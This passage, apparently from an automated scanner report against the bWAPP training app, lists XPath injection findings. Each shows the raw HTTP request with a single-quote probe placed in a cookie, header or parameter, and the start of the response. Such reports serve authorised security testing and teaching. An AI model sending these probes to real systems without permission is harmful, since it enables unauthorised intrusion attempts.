User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.35. http://192.168.52.147/bWAPP/ba_insecure_login.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.36. http://192.168.52.147/bWAPP/ba_insecure_login.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_insecure_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:30 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13469

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.37. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.38. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.39. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.40. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:15 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.41. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.42. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.43. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.44. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [movie_genre cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.45. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.46. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.47. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:06:07 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.48. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.49. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:05:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13469

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.50. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:57 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.51. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
